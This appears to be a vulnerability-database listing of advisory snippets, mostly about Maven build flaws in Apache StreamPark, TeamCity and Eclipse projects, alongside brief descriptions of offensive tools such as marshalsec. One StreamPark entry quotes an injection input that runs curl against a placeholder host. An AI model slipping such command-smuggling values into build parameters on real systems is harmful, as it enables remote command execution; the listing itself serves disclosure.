vpn_exploitation_tool

AD + Citrix VPN Data Harvester Modular Java tool for testing...

EUVD-2022-3767

Malicious code in bioql PyPI...

marshalsec

It is an offensive tool for Java deserialization vulnerabilities. The repository contains a Java tool called "marshalsec" that exploits Java object deserialization vulnerabilities, allowing for remote code execution. The tool includes payload generators for various Java serialization libraries,...

CVE-2024-31139

In JetBrains TeamCity before 2024.03 xXE was possible in the Maven build steps detector...

CVE-2019-10248

Eclipse Vorto versions prior to 0.11 resolved Maven build artifacts for the Xtext project over HTTP instead of HTTPS. Any of these dependent artifacts could have been maliciously compromised by a MITM attack. Hence produced build artifacts of Vorto might be infected...

CVE-2019-10240

Eclipse hawkBit versions prior to 0.3.0M2 resolved Maven build artifacts for the Vaadin based UI over HTTP instead of HTTPS. Any of these dependent artifacts could have been maliciously compromised by a MITM attack. Hence produced build artifacts of hawkBit might be infected...

Arbitrary Command Injection

Overview Affected versions of this package are vulnerable to Arbitrary Command Injection due to insufficient validation of input parameters in the maven build process. An attacker can execute arbitrary commands by injecting malicious input into the build parameters. Note: This is only exploitable...

GHSA-5V69-92VW-FMJH Apache StreamPark: maven build params could trigger remote command execution

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and...

GHSA-7G94-HFQC-Q993 Apache StreamPark: Unchecked maven build params could trigger remote command execution

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and...

CVE-2024-29737

CVE-2024-29737 concerns a command-injection flaw in Apache StreamPark (Project module). The vulnerability arises from lax validation of build parameters in the Maven integration, allowing an authenticated user with system-level permissions to inject commands via the Build Argument (demonstrated b...

CVE-2024-29737 Apache StreamPark (incubating): maven build params could trigger remote command execution

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and...

CVE-2024-29737 Apache StreamPark (incubating): maven build params could trigger remote command execution

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and...

CVE-2023-52291

CVE-2023-52291 concerns Apache StreamPark. The vulnerability stems from lax validation of maven build parameters in the StreamPark project module, allowing command injection when the input parameter < is used (for example, < (curl http://xxx.com)). An attack requires the user to be logged i...

CVE-2023-52291 Apache StreamPark (incubating): Unchecked maven build params could trigger remote command execution

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and...

CVE-2024-31139

In JetBrains TeamCity before 2024.03 xXE was possible in the Maven build steps detector...

CVE-2024-31139

In JetBrains TeamCity before 2024.03 xXE was possible in the Maven build steps detector...

CVE-2024-31139

In JetBrains TeamCity before 2024.03 xXE was possible in the Maven build steps detector...

JetBrains TeamCity 安全漏洞

JetBrains TeamCity is a set of distributed build management and continuous integration tools from the Czech company JetBrains. The tool provides continuous unit testing, code quality analysis, and build issue analysis reports. A security vulnerability exists in JetBrains TeamCity versions prior t...

SUSE-SU-2022:3706-1 Security update for google-gson

This update for google-gson fixes the following issues: Fixed security issue: - CVE-2022-25647: Deserialization of Untrusted Data bsc1199064 Other non security fixes: - Build with Java = 9 in order to produce a modular jar by compiling the module-info.java sources with all other classes built wit...

Eclipse Vorto resolved Maven build artifacts for the Xtext project over HTTP instead of HTTPS

Eclipse Vorto versions prior to 0.11 resolved Maven build artifacts for the Xtext project over HTTP instead of HTTPS. Any of these dependent artifacts could have been maliciously compromised by a MITM attack. Hence produced build artifacts of Vorto might be infected...